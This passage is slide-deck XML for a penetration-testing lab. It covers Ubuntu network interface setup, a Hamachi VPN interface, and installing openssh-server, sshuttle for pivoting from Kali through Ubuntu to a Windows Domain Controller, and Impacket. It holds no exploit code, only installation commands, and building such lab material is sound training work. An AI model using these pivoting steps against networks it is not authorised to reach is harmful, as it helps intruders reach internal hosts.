      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="422" name="Google Shape;422;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1172250"/>
            <a:ext cx="5336524" cy="371122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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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Configuring the 2 Network Interfaces on Ubuntu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5641325" y="1361325"/>
            <a:ext cx="28320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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>As we will need 2 network interfaces on the Ubuntu Machine, we will need to configure them to allow for network connectivity (the machine defaults to use the new interfaces that we have added), which will be made host-only.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Add the 2 lines highlighted to allow connectivity and test it by “ping google.com” (to ensure dns is working correctly)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="429" name="Google Shape;429;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1019852"/>
            <a:ext cx="5202574" cy="3617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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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2800"/>
              <a:t>Final Network Configuration Screenshot (Ubuntu)</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="435" name="Google Shape;435;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1172250"/>
            <a:ext cx="5056300" cy="3818851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5509175" y="1262200"/>
            <a:ext cx="3271200" cy="306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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This is how the interface configuration should look like after finishing the set-up on the Ubuntu Server </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>eth0 (NAT interface for connectivity to the VPN)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>eth1 (Internal Interface for communicating with the Windows Domain Controller)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ham0 (hamachi VPN custom interface)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>lo (loopback interface)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="13790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Installing ssh and sshuttle for pivoting </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="442" name="Google Shape;442;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3734125" y="808800"/>
            <a:ext cx="5026175" cy="2495073"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Google Shape;443;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1112400"/>
            <a:ext cx="3282600" cy="1631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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Installation and Configuration</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Commands (on Ubuntu):</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo apt-get install openssh-server</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ sudo /etc/init.d/ssh restart</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="13790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Installing ssh and sshuttle for pivoting </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Google Shape;449;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429325" y="866550"/>
            <a:ext cx="3304800" cy="260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800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Sshuttle</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Installation Commands (Kali):</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo apt install sshuttle</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Sshuttle is used for pivoting from our session in the Ubuntu machine into our remote Windows Server via a SSH connection. This allows our Kali Linux to communicate with the Windows Server despite being in different IP subnets.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="450" name="Google Shape;450;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886525" y="896900"/>
            <a:ext cx="5105075" cy="40150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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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Kali Linux Setup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="Google Shape;456;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="943650"/>
            <a:ext cx="7884900" cy="419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800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Impacket</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Installation Commands:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>git clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/SecureAuthCorp/impacket.git</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ cd impacket</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ python3 -m pip install .</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ sudo pip install virtualenv</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
